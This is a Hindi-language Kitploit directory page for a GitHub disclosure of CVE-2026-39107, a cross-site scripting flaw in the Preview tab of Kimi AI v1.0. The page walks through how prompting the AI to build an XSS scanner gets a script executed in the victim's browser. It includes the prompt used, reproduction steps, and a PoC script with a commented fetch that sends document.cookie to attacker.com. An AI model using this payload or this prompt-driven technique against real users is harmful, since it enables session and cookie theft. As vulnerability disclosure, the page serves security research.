Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-39107 — किमी AI v1.0 के प्रीव्यू टैब में संग्रहीत XSS भेद्यता का विस्तृत खुलासा, जिसमें हमले का परिदृश्य, PoC, और सुरक्षा शोधकर्ताओं के लिए उपचार मार्गदर्शन शामिल है। | Kitploit
उपकरण/GitHubGitHub/mgtx2/cve-2026-39107
भेद्यता विश्लेषणवेब एप्लिकेशन शोषणवेब सुरक्षापेपर और शोधलर्निंग और शिक्षा
GitHubmgtx2/cve-2026-39107

CVE-2026-39107

किमी AI v1.0 के प्रीव्यू टैब में संग्रहीत XSS भेद्यता का विस्तृत खुलासा, जिसमें हमले का परिदृश्य, PoC, और सुरक्षा शोधकर्ताओं के लिए उपचार मार्गदर्शन शामिल है।

रिपॉजिटरी देखें
13 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-39107: Kimi AI v1.0 में क्रॉस-साइट स्क्रिप्टिंग (XSS)

विवरण

Kimi AI v1.0 वेब इंटरफ़ेस की 'Preview' सुविधा में क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता मौजूद है। एप्लिकेशन AI मॉडल द्वारा उत्पन्न HTML/JavaScript पेलोड को ठीक से सैनिटाइज़ या एन्कोड करने में विफल रहता है। जब उपयोगकर्ता AI-जनित कोड देखने के लिए 'Preview' टैब पर स्विच करता है, तो दुर्भावनापूर्ण पेलोड सीधे DOM में रेंडर हो जाता है, जिससे पीड़ित के ब्राउज़र सत्र में मनमाना JavaScript निष्पादन होता है।

शोधकर्ता

मुस्तफा हमीद

भेद्यता विवरण

  • भेद्यता प्रकार: AI प्रतिक्रिया के माध्यम से स्टोर्ड/स्टोर्ड-जैसी क्रॉस-साइट स्क्रिप्टिंग (XSS)
  • प्रभावित उत्पाद: Kimi AI
  • प्रभावित संस्करण: v1.0
  • प्रभावित घटक: 'Preview' टैब / कोड रेंडरिंग घटक

हमले का परिदृश्य और शोषण

इस भेद्यता का शोषण AI से एक सुरक्षा उपकरण या स्क्रिप्ट (जैसे, XSStrike के समान एक स्वचालित XSS स्कैनर) बनाने के लिए प्रॉम्प्ट देकर किया जा सकता है, जिसमें अंतर्निहित पेलोड हों। AI अनुरोधित एप्लिकेशन सोर्स कोड उत्पन्न करता है लेकिन दुर्भावनापूर्ण पेलोड को HTML/JavaScript फ्रेमवर्क के भीतर एम्बेड कर देता है। जब पीड़ित जनित टूल को परीक्षण या देखने के लिए 'Preview' टैब पर जाता है, तो एम्बेडेड दुर्भावनापूर्ण पेलोड सैनिटाइज़ेशन को बायपास करके तुरंत निष्पादित हो जाता है।

उपयोग किया गया प्रॉम्प्ट:

"XSStrike के समान एक सरल वेब-आधारित XSS स्कैनर टूल बनाएं। स्कैनिंग के लिए पेलोड की सूची वाला एक इंटरफ़ेस शामिल करें।"

एम्बेडेड दुर्भावनापूर्ण पेलोड उदाहरण:

root@kitploit:~
<script>
    alert('mustafa');
// Potential for malicious action: fetch('http://attacker.com/log?cookie=' + document.cookie)
</script>

पुनरुत्पादन के चरण

1.Kimi AI वेब प्लेटफ़ॉर्म में लॉग इन करें।

2.स्कैनर कोड वाला टूल (जैसे XSStrike क्लोन) बनाने का अनुरोध करने वाला प्रॉम्प्ट प्रदान करें।

3.AI मॉडल द्वारा कोड प्रतिक्रिया पूरी तरह उत्पन्न करने की प्रतीक्षा करें।

4.रेंडर किए गए एप्लिकेशन को देखने के लिए चैट इंटरफ़ेस में 'Preview' टैब पर क्लिक करें।

5.एप्लिकेशन प्रीव्यू कंटेनर के भीतर JavaScript संदर्भ को फ़िल्टर करने में विफल रहता है, जिससे पीड़ित के ब्राउज़र में स्क्रिप्ट का तत्काल निष्पादन होता है।

प्रूफ ऑफ कॉन्सेप्ट (PoC)

नीचे स्क्रीनशॉट है जो XSS पेलोड के सफल निष्पादन को प्रदर्शित करता है। दुर्भावनापूर्ण JavaScript 'Preview' टैब पर नेविगेट करते ही तुरंत ट्रिगर हो जाता है:

XSS
टूल डाउनलोड करें